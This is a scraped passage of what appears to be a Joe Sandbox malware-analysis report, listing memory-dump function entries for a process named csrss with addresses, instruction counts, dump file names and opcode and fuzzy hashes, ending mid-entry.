Instruction Fuzzy Hash: F7E1F23095EB47CFE36ACB28D49567677E5FF46300B10857EE08EC3592DA29F84A8781

Function 00007FFAAC5D0351 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6569bb9dd2940b2827d0d5a573deedfac3d70c96b7503ce837a86dc4c2587310
Instruction ID: f33a235892767e9c6e0868ca5a6f6a42f7e5e9f25f3f6d7ae2aca664a6825680
Opcode Fuzzy Hash: 6569bb9dd2940b2827d0d5a573deedfac3d70c96b7503ce837a86dc4c2587310
Instruction Fuzzy Hash: 02E1033095EB47CFF36ADB28D4906757BE4FF86300B10857EE48E87592DA29F8498781

Function 00007FFAAC5D14C5 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d02b848ea609e663e4be31422084bbc7c2891190a7ec67264c39998ee6d10d0
Instruction ID: 9244f6d80de4cb6b33ea02d464beb1aaed003e43126635705ac28d020f26625d
Opcode Fuzzy Hash: 6d02b848ea609e663e4be31422084bbc7c2891190a7ec67264c39998ee6d10d0
Instruction Fuzzy Hash: 9D51E791CDE797EDF652B774E065AF96B845F02334B288177E04E865E38D0DB48887C1

Function 00007FFAAC4CB9C5 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bcd90d6085ee1cd54f9708e33d57113aaff83efb0646f7e9c7514b0d3209c19
Instruction ID: f531bbcb32a22c2b4674323bed347489f3940368c1e11e14515d156705fad371
Opcode Fuzzy Hash: 0bcd90d6085ee1cd54f9708e33d57113aaff83efb0646f7e9c7514b0d3209c19
Instruction Fuzzy Hash: 69B16E3090EA4ACFFB55DB28C459AA97BE0FF55304F1441B9D44DC72A6DE28EC0987C1

Function 00007FFAAC5D42EF Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6d8487375caa735d67958c776c342b6da7b46bbbd623221ba55822ed0088ba
Instruction ID: 16d9a509c8e011b2101312d817ef22d368b8c0f45cb0694e2c2699fb9f24fba7
Opcode Fuzzy Hash: df6d8487375caa735d67958c776c342b6da7b46bbbd623221ba55822ed0088ba
Instruction Fuzzy Hash: 8DC18F30559646CBEB0ECF18C4D06B537A5FF46311B5485BEE84F8B68ADB38E485CB81

Function 00007FFAAC5D921F Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e27b4593983a6a6b750198126964c7e8048362985f8d506a9185a77abafc84
Instruction ID: 7f3db04071c51c2aaa07830e950254bbbfecfcc5052a6fe5b288b5fe992b9b6f
Opcode Fuzzy Hash: e7e27b4593983a6a6b750198126964c7e8048362985f8d506a9185a77abafc84
Instruction Fuzzy Hash: 69C1C17055A642CBEB4ECF08C0D06B137A5FF46310B5485BEE84F8B69BDA38E845CB81

Function 00007FFAAC4D060F Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e29cd2e88e27ed6422e28f0f43ae9ac4938eafb6c251bb2263983835195d62d
Instruction ID: 38e172478548dc44cc6da3f004ec3e5e66239478b92ae499301688b5bb38a964
Opcode Fuzzy Hash: 1e29cd2e88e27ed6422e28f0f43ae9ac4938eafb6c251bb2263983835195d62d
Instruction Fuzzy Hash: 8CC1E370519656CBFB0ADF14C0E46B53BA1FF46314B5485BED84F8B68BCA38E485CB88

Function 00007FFAAC5D6477 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2149b9e3a2d94a5590647accbe0a0bdb93de0f2ecadc632a42682fd9b36bba
Instruction ID: 06a0c519a23da82e125e10ed583b88898e036b6c39c357f9ccec89b38b2b731d
Opcode Fuzzy Hash: ad2149b9e3a2d94a5590647accbe0a0bdb93de0f2ecadc632a42682fd9b36bba
Instruction Fuzzy Hash: 7921FC4ADCE393CAFA26D3B9A4256B815545F53221F188977F44D861D3DC0CB44F87C2

Function 00007FFAAC5D1567 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8d143d7b369b192fa01c805d4be5a356973770fa15f79c3062cbfc6381032b
Instruction ID: 941e6d232dc4e7f3014a546bb5fdb206d0d15ce0bf3781fb2eb5cc43df54cd92
Opcode Fuzzy Hash: 7d8d143d7b369b192fa01c805d4be5a356973770fa15f79c3062cbfc6381032b
Instruction Fuzzy Hash: 2521B151DCE387CEF666E77895656BA2E845F12230F1881BBE04E865E3DC0CA84857C2

Function 00007FFAAC46C4D0 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c950bacd80e2f243af6b3f5e2cce7c63db7f8d5eb998a4ff56b1765ac70d7720
Instruction ID: 0f9eeedb61799a58dc7a7975ef75ba8b76c81c3aa3813034f09485fbe037aa6d
Opcode Fuzzy Hash: c950bacd80e2f243af6b3f5e2cce7c63db7f8d5eb998a4ff56b1765ac70d7720
Instruction Fuzzy Hash: CCA1A430A0D546CFF7A5DB28C488B607BD1FF5A318F1485B9C04DCB2A6DA79E84AC781

Function 00007FFAAC4CD88F Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ed941344428c5f872b7035e3188fcb2e09b5684f934667b82f98826def1533
Instruction ID: da974d26def90b1b5a60ef43c4e734339e809d88732d0613c80b5d91476ae1f1
Opcode Fuzzy Hash: c1ed941344428c5f872b7035e3188fcb2e09b5684f934667b82f98826def1533
Instruction Fuzzy Hash: 43212C12D4EA87CBF226A37868294F82B405F43624F1881B6D84E8E1F3DC0DB46D43DA

Function 00007FFAAC5D7FE6 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f41d9dddb2031bacdfcb9078a68a3e55fa3391685d3254640e7039fbc3fa46c
Instruction ID: cc2504776026bf9135284addf6209b3a70386e404e6fa13da8a8a41905c418d7
Opcode Fuzzy Hash: 9f41d9dddb2031bacdfcb9078a68a3e55fa3391685d3254640e7039fbc3fa46c
Instruction Fuzzy Hash: 7581F53198EB43CBF36EDB68984567577E4EF96310B14857FE08EC2192DA28F40A87C1

Function 00007FFAAC5DB5BC Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e9ffdb1ccef8ea6350821c4898c022cf1641f2b4152086d1bf3e4554752008
Instruction ID: 51ee2bb8cc804361e20e1c01eef2ff78cd361b043d5652ba72f7bf7adbe6e87a
Opcode Fuzzy Hash: b1e9ffdb1ccef8ea6350821c4898c022cf1641f2b4152086d1bf3e4554752008
Instruction Fuzzy Hash: 8B91C36184E7C68FF367D72448166A53FA5DF53210F0942FBE48D8B1A3ED18981E83D2

Function 00007FFAAC4CF3D6 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f79511a1b2546360ff1f932b2be4747ccfc99ee8e65b7087b38cf9b5b096e5f
Instruction ID: aa19677fd88afa14545501509432b5ae426baec3857bb5fe45cf89a7e0bef642
Opcode Fuzzy Hash: 9f79511a1b2546360ff1f932b2be4747ccfc99ee8e65b7087b38cf9b5b096e5f
Instruction Fuzzy Hash: CA81167190EA068BF3299B28D4494B577E0EF5631CB15857ED48FC31A3DE2CF8068789

Function 00007FFAAC5DB37C Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f1814fe415cac677817b38e5995daa176977c03fa05154a09677cbb369a12c
Instruction ID: c4303cb19a2901d070950a343c5703e828e1b495d79c864da4066459b511d365
Opcode Fuzzy Hash: 90f1814fe415cac677817b38e5995daa176977c03fa05154a09677cbb369a12c
Instruction Fuzzy Hash: 9091A16184E3C68FF767CB2444152653FA2EF57205F0941FFE48DCB5A3EA19980E8382

Function 00007FFAAC4CD531 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8080016ce49372ebe76536a6e6c8d9f68817156458ac11525b8437cecaf38ea1
Instruction ID: 516282753d0536df3722375da2a103fb3667a27049edff5e0f96a18b9a675be7
Opcode Fuzzy Hash: 8080016ce49372ebe76536a6e6c8d9f68817156458ac11525b8437cecaf38ea1
Instruction Fuzzy Hash: C2712674A0DC49CFFBA9DB08C8496B437D0FF5A319B144279D48ECB561DA28E82AC7C4

Function 00007FFAAC5D6152 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e8c271dc67cb8d4d692846fad5ed883e139237eb938c1eaf15642fff7d990f
Instruction ID: a57f6e146e7dddd7325bac2d03c62e68d0371d05860c69de151d9856757ed558
Opcode Fuzzy Hash: 61e8c271dc67cb8d4d692846fad5ed883e139237eb938c1eaf15642fff7d990f
Instruction Fuzzy Hash: 2561077958E64ACFFB69DB1888566F837C4EF863107044ABAE05FC3552DE18E80A8781

Function 00007FFAAC5D30FD Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86bb3f631870fb373ac55d982dbd016ccdd6f914edc1b354a75b015f379e76b7
Instruction ID: 952432fb47424015075a5690de325f80ea6e685cacbe32be63c7a85a78352d41
Opcode Fuzzy Hash: 86bb3f631870fb373ac55d982dbd016ccdd6f914edc1b354a75b015f379e76b7
Instruction Fuzzy Hash: 23511431D8E7438BF32A8B1CE8466B577E4EF52314B14453FE08FC3592DA29F80A8681

Function 00007FFAAC5D7CA0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24334a70a12b5bf43caffe6259b895ae98a39cf4fed77c99f5ec5fbf3eadee6e
Instruction ID: 6a5d32dd62612996efb3f17a890bcd1b3e70bd77ef3c8972d47d773406f0a824
Opcode Fuzzy Hash: 24334a70a12b5bf43caffe6259b895ae98a39cf4fed77c99f5ec5fbf3eadee6e
Instruction Fuzzy Hash: BF41B321A4E78BCFF367AB6858552B87FD4EF47250B0941FBE08DCB197D908984A83D1

Function 00007FFAAC4CBD11 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f3f77422eceec68fff519d36d322bbd0036e0f2fa01bd3daeb829ac01c0a21
Instruction ID: 620249dbfa51102c431c8bbb12e0d564d8a71cb4f801400112ae25c695d9eb17
Opcode Fuzzy Hash: 94f3f77422eceec68fff519d36d322bbd0036e0f2fa01bd3daeb829ac01c0a21
Instruction Fuzzy Hash: BC314831E1DA494FE799EB28D44AABD77E1EF8A310F0400BAD44EC31A2DD24EC428781

Function 00007FFAAC5D31C4 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49252175d1b1fc6df113d6e2c0de4e573faf053bf98f5176fbf7ee23190ab6c6
Instruction ID: 7e305b5a02f4f3366852f8f8cd9656f564ff599cab5906bfbaab5a66aa0c3499
Opcode Fuzzy Hash: 49252175d1b1fc6df113d6e2c0de4e573faf053bf98f5176fbf7ee23190ab6c6
Instruction Fuzzy Hash: 4C31F131D8E7428BF36AC71C98462757BE8EF97310B14817FE08FC3592D918A80A82C2

Function 00007FFAAC5D5937 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e033f41bd18f2e691bdc721f7396784ed087b2d505ebffc1ee2884832ff9d4
Instruction ID: dd809231b342847b759f718b4cdabc42a93915c253ef241dfffcbaf09b57ca8c
Opcode Fuzzy Hash: 96e033f41bd18f2e691bdc721f7396784ed087b2d505ebffc1ee2884832ff9d4
Instruction Fuzzy Hash: 5F41613164CA198FDF8DEB28C495EA577E1FF69321B4441AAE00EC3552CE34E845CB81

Function 00007FFAAC5D0977 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30866af025455c64dfc90cabc94ceb60559b6fa9731e95905b3fb3008e6c9276
Instruction ID: 4802fd128410615daf6984626d7b052dec5cf4075099062e2f569c17cc7ede78
Opcode Fuzzy Hash: 30866af025455c64dfc90cabc94ceb60559b6fa9731e95905b3fb3008e6c9276
Instruction Fuzzy Hash: 4041573164CA49CFDF89EF58D495EB4B7E1FBA9310B0445AAE00EC3692DE35E845CB81

Function 00007FFAAC5DA867 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af13f85250e44ded1886a0bf7fc2daaae9efee78ee78ecfd8da8f4ef3931af7c
Instruction ID: d020ae634c10dfed9b225ad119df385acfecebdf9f6c4a5490dce232a570f9ee
Opcode Fuzzy Hash: af13f85250e44ded1886a0bf7fc2daaae9efee78ee78ecfd8da8f4ef3931af7c
Instruction Fuzzy Hash: 6641547165CA09CFDF89EB28C495EB577E1FF69320B0445AAE00EC3652DE34E845CB81

Function 00007FFAAC5DA911 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85080e4df5a6ab2de7ce13ea4b8d14fcb9af1d704b2dcfe7d7231df7a9a324f7
Instruction ID: 586b20a009bd9bd9495b795535d9237bbdb32efa0d25f207a3bdc4e17e4ea9d6
Opcode Fuzzy Hash: 85080e4df5a6ab2de7ce13ea4b8d14fcb9af1d704b2dcfe7d7231df7a9a324f7
Instruction Fuzzy Hash: 7331707165CA458FDF89EB28C499E65B7E1FF69310B0445AEE00EC7692CE30EC45CB81

Function 00007FFAAC5D0A21 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58882bb4d077660bbabf5026d723b546b23953a0b05229bdfa154aba5b4e7ee6
Instruction ID: de45e30d5f7d56b724b574c32f7e700b26ba569f7423bfeacc4efc122b112d48
Opcode Fuzzy Hash: 58882bb4d077660bbabf5026d723b546b23953a0b05229bdfa154aba5b4e7ee6
Instruction Fuzzy Hash: 1731653164CA458FDF99EF28C495EA477E1FBA9310B0446AEE44EC7692CE34E845CF81

Function 00007FFAAC5D59E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c211021c99bdc24907edcff5604256ca8bbabb4a56b470ee24856eae1e71c2
Instruction ID: 1cd03f4e6bd581ac448cc63406dbde83f27791907d17027117de9ee3b1e7abc5
Opcode Fuzzy Hash: 52c211021c99bdc24907edcff5604256ca8bbabb4a56b470ee24856eae1e71c2
Instruction Fuzzy Hash: 4131803160CA488FDF8DEF28C495EA577E1FF69311B0446AAE00EC7192CE34E844CB81

Function 00007FFAAC4CBB7D Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ce2db85e16672a9ca63af5fd489d3050284922184484ad3ee0feb2f817bccb
Instruction ID: fba4936336c8c3444ece5c2d418cecc457b09f35f47ac77e8abf0e7edc1f9524
Opcode Fuzzy Hash: a6ce2db85e16672a9ca63af5fd489d3050284922184484ad3ee0feb2f817bccb
Instruction Fuzzy Hash: 8A312830A0891D8FDF85EF68C459EA97BE1FF69315B1440AAE00DD72A1DA35EC45CB80

Function 00007FFAAC5DCB9D Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2c42e705b23f869c60b432416bff438b5066ebff531e9cf29a6e8c4e3471a7
Instruction ID: 32859a59a5e01d6972b691d68b1bd371f9ed8942c915585e7419d2a6c605d928
Opcode Fuzzy Hash: 7d2c42e705b23f869c60b432416bff438b5066ebff531e9cf29a6e8c4e3471a7
Instruction Fuzzy Hash: EE21C522A4DE0B4BF765E72C9455AF677E2EFE5350724817AE40EC31A6ED18F80643C4

Function 00007FFAAC5D597B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21714aa053d0f43ce13d7f2739b2912ecfd89677c836512bc5fec5976d84109c
Instruction ID: e3de23d64d550f2b72ee1703d161fba52820a3513cc1a968eb5e5baf46424993
Opcode Fuzzy Hash: 21714aa053d0f43ce13d7f2739b2912ecfd89677c836512bc5fec5976d84109c
Instruction Fuzzy Hash: DF315E71648A098FDF8DEB28C095EA577E1FF69310B0446AAE00EC7592CE34E845CB81

Function 00007FFAAC5D09BB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b080504543073823e6bf863268b1d14d29d2d6536cf5fc40b927df70095029
Instruction ID: 4290180d96bbf09401314f2b2a3f76e43b002663b58d9e122d766fc6106f661a
Opcode Fuzzy Hash: 31b080504543073823e6bf863268b1d14d29d2d6536cf5fc40b927df70095029
Instruction Fuzzy Hash: 5531453164CA45CFDF99EF28C495EA477E1FBA9310B1445AAE00EC7692CE34E845CB81

Function 00007FFAAC5DA8AB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d660252ee5bbc5e74c21e854b3e62073daa69de7c0567f68737aa9eb031a802
Instruction ID: 4f91bec4a87229aa3898a7bf8c570f1d25b441740be741752ed196610b7a1519
Opcode Fuzzy Hash: 0d660252ee5bbc5e74c21e854b3e62073daa69de7c0567f68737aa9eb031a802
Instruction Fuzzy Hash: 2931527165CA45CFDF88EB28C059EA577E1FF69310B0545AEE00EC7692DE34E845CB81

Function 00007FFAAC4CF0A9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8218a22a16434f033c9c244238d2f63bf035212c8d7b3c0db28064fb6c620830
Instruction ID: bdb9d8c256312943631367debcd61e6a6d742d843c6eeaeb598a9049d5db014b
Opcode Fuzzy Hash: 8218a22a16434f033c9c244238d2f63bf035212c8d7b3c0db28064fb6c620830
Instruction Fuzzy Hash: B831C46191E6C68BF76753A858590B97FA0DF4321CB1882BBD08DC61A3DD0C984AC399

Function 00007FFAAC4CD1DD Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c453f13e96dc00a6590fec94871ace00cc2ef05d107fbb575a4246396abcc7e9
Instruction ID: 21f1f12271b71594e6d7ec67c768bbbbffe109d8e26122140d1ab42ea880e5a1
Opcode Fuzzy Hash: c453f13e96dc00a6590fec94871ace00cc2ef05d107fbb575a4246396abcc7e9
Instruction Fuzzy Hash: E731DC7190DA4DCFEB86DB54D8549FDBBB0FF45314F10407AE00EEB2A1CE28A9168B94

Function 00007FFAAC5D5745 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd384fcb880c283018a2a0dfbd52d961641960dc18aced022c51bc9a19c441c
Instruction ID: d14c809782c6cc0abff42037d2838c55f934c93e91eb78b991f190130ad7ca62
Opcode Fuzzy Hash: 9cd384fcb880c283018a2a0dfbd52d961641960dc18aced022c51bc9a19c441c
Instruction Fuzzy Hash: 18315BB099A60BCFFF5ADB5484516BE7BB9FF45340FA0407BE00EC2581DA38A9488781

Function 00007FFAAC5D0785 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c254af552df48decda5584a79244e4e255e794d193f6f44fa7aebb1232d5e790
Instruction ID: 5c7cca4cb9f6252ab854dd694148f0c63b9f0d4ec26f98c79b4e6461a9dff15d
Opcode Fuzzy Hash: c254af552df48decda5584a79244e4e255e794d193f6f44fa7aebb1232d5e790
Instruction Fuzzy Hash: 73311830D8A64BCBEB9ADB5484556BD7BE4FF85300F50817AE00ED6181CE38A9888BC1

Function 00007FFAAC5DA675 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
